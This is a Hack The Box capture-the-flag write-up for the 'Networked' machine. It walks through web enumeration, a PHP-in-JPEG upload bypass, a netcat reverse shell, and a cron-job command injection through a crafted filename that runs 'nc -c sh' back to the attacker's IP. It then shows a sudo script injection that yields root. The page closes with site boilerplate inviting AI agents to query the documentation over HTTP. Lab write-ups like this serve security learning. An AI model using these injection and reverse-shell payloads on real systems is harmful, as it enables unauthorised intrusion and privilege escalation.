# HTB - Networked ![Networked](/files/-M6YLaAC8XcKNffVJ9qx) ## Getting Root: 1. We find a **backup** directory on the web server that allows us to read the source code of the php upload application 2. We use **GNU GIMP** to embed php code on the comments of the image properties and upload the **JPEG** to get command execution and get a **reverse shell** 3. Got user **guly** by exploiting a **cron job** that executes a php script every 3 minutes 4. Got root by exploiting a shell script that changes information related to the networking interfaces ### Tools Used: **`nmap, ffuf, gnu gimp, ncat`** ## Nmap ```bash # Nmap 7.80 scan initiated Mon May 4 12:46:19 2020 as: nmap -sC -sV -p- -oA nmap/allports 10.10.10.146 Nmap scan report for 10.10.10.146 Host is up (0.54s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA) | 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA) |_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 443/tcp closed https Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon May 4 13:12:58 2020 -- 1 IP address (1 host up) scanned in 1599.45 seconds ``` ## Enumeration ### HTTP Enumerating directories ```bash ffuf -u http://10.10.10.146/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.0.2 ________________________________________________ :: Method : GET :: URL : http://10.10.10.146/FUZZ :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403 ________________________________________________ backup [Status: 301, Size: 235, Words: 14, Lines: 8] uploads [Status: 301, Size: 236, Words: 14, Lines: 8] :: Progress: [62275/62275] :: Job [1/1] :: 943 req/sec :: Duration: [0:01:06] :: Errors: 3 :: ``` Enumerating files ```bash ffuf -c -mc 200 -u http://10.10.10.146/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -e .txt,.php /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.0.2 ________________________________________________ :: Method : GET :: URL : http://10.10.10.146/FUZZ :: Extensions : .txt .php :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200 ________________________________________________ . [Status: 200, Size: 229, Words: 33, Lines: 9] upload.php [Status: 200, Size: 169, Words: 11, Lines: 6] index.php [Status: 200, Size: 229, Words: 33, Lines: 9] photos.php [Status: 200, Size: 1533, Words: 78, Lines: 27] lib.php [Status: 200, Size: 0, Words: 1, Lines: 1] :: Progress: [111126/111126] :: Job [1/1] :: 966 req/sec :: Duration: [0:01:55] :: Errors: 3 :: ``` ### Got a backup file Checking the **backup** directory, we noticed a **backup.tar** file with the same **php** files we found using **ffuf** ![](/files/-M6YA0JxQtGKfIhnOOKG) ```bash -rw-r--r-- 1 kali kali 10240 May 4 12:51 backup.tar -rw-r--r-- 1 kali kali 229 Jul 9 2019 index.php -rw-r--r-- 1 kali kali 2001 Jul 2 2019 lib.php -rw-r--r-- 1 kali kali 1871 Jul 2 2019 photos.php -rw-r--r-- 1 kali kali 1331 Jul 2 2019 upload.php ``` ### Checking The Files Found Analysis of the **upload.php** code ![](/files/-M6YB_yB-IGc0s3-NvPP) ## Exploit We tried uploading a **php webshell** but it failed. However when we uploaded a jpeg, it uploaded it successfully. ![](/files/-M6YE5o7b-49oZlECFP0) ### Embedding php code on a JPEG We use GNU GIMP to embed **php** code on the comments of the image properties. ![](/files/-M6YDhFCkOO8DF1Ksqru) We get command execution and get a shell using **netcat** ![](/files/-M6YDYfNaqMY_6hF84w0) ```bash Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.146. Ncat: Connection from 10.10.10.146:49080. id uid=48(apache) gid=48(apache) groups=48(apache) python -c 'import pty;pty.spawn("/bin/bash")' bash-4.2$ id id uid=48(apache) gid=48(apache) groups=48(apache) ``` ## Privilege Escalation ### Getting User Guly The user flag is under the home directory of **guly** but we can't read it yet. There are some files we can read. one of them is a **`crontab`** that executes the **`check_attack.php`** script every 3 minutes. ```bash bash-4.2$ ls -la /home/guly ls -la /home/guly total 28 drwxr-xr-x. 2 guly guly 159 Jul 9 2019 . drwxr-xr-x. 3 root root 18 Jul 2 2019 .. lrwxrwxrwx. 1 root root 9 Jul 2 2019 .bash_history -> /dev/null -rw-r--r--. 1 guly guly 18 Oct 30 2018 .bash_logout -rw-r--r--. 1 guly guly 193 Oct 30 2018 .bash_profile -rw-r--r--. 1 guly guly 231 Oct 30 2018 .bashrc -rw------- 1 guly guly 639 Jul 9 2019 .viminfo -r--r--r--. 1 root root 782 Oct 30 2018 check_attack.php -rw-r--r-- 1 root root 44 Oct 30 2018 crontab.guly -r--------. 1 guly guly 33 Oct 30 2018 user.txt ``` ```bash bash-4.2$ cat crontab.guly cat crontab.guly */3 * * * * php /home/guly/check_attack.php bash-4.2$ bash-4.2$ cat check_attack.php cat check_attack.php $value) { $msg=''; if ($value == 'index.html') { continue; } #echo "-------------\n"; #print "check: $value\n"; list ($name,$ext) = getnameCheck($value); $check = check_ip($name,$value); if (!($check[0])) { echo "attack!\n"; # todo: attach file file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX); exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; mail($to, $msg, $msg, $headers, "-F$value"); } } ?> ``` Analysis of the **check\_attack.php** code 1\) The script uses **`/var/www/html/uploads`** and checks all the files\ 2\) It performs a grep like function to avoid files that begin with a **.** (hidden files)\ 3\) Check files names and extensions and sends an email to if it finds something that is not part of the valid extensions list. ![](/files/-M6YHGsk_SI5_piYXH6E) To exploit the **php** script, we execute the following command to create a file that gets us a shell: **`touch 'wtf;nc -c sh 10.10.14.22 9001;.php'`** \ \ This will make the **php** script execute **wtf** (which is nothing) then executes the **netcat** command to connects to our kali box. ```bash # under /var/www/html/uploads touch 'wtf;nc -c sh 10.10.14.22 9001;.php' ``` ```bash # Got a shell Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.146. Ncat: Connection from 10.10.10.146:49106. id uid=1000(guly) gid=1000(guly) groups=1000(guly) ``` ### Getting Root ```bash # To get root [guly@networked ~]$ sudo -l sudo -l Matching Defaults entries for guly on networked: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User guly may run the following commands on networked: (root) NOPASSWD: /usr/local/sbin/changename.sh [guly@networked ~]$ ``` ```bash # The script [guly@networked ~]$ cat /usr/local/sbin/changename.sh cat /usr/local/sbin/changename.sh #!/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF DEVICE=guly0 ONBOOT=no NM_CONTROLLED=no EoF regexp="^[a-zA-Z0-9_\ /-]+$" for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x done echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly done /sbin/ifup guly0 ``` We can use spaces to execute multiple commands, For example:\ `eth0 /bin/bash` ```bash # Got root [guly@networked ~]$ sudo /usr/local/sbin/changename.sh sudo /usr/local/sbin/changename.sh interface NAME: yup /bin/bash yup /bin/bash interface PROXY_METHOD: nope nope interface BROWSER_ONLY: nope nope interface BOOTPROTO: nope nope [root@networked network-scripts]# id id uid=0(root) gid=0(root) groups=0(root) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://squid22.gitbook.io/notes/htb-writeups/writeups/htb-networked.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.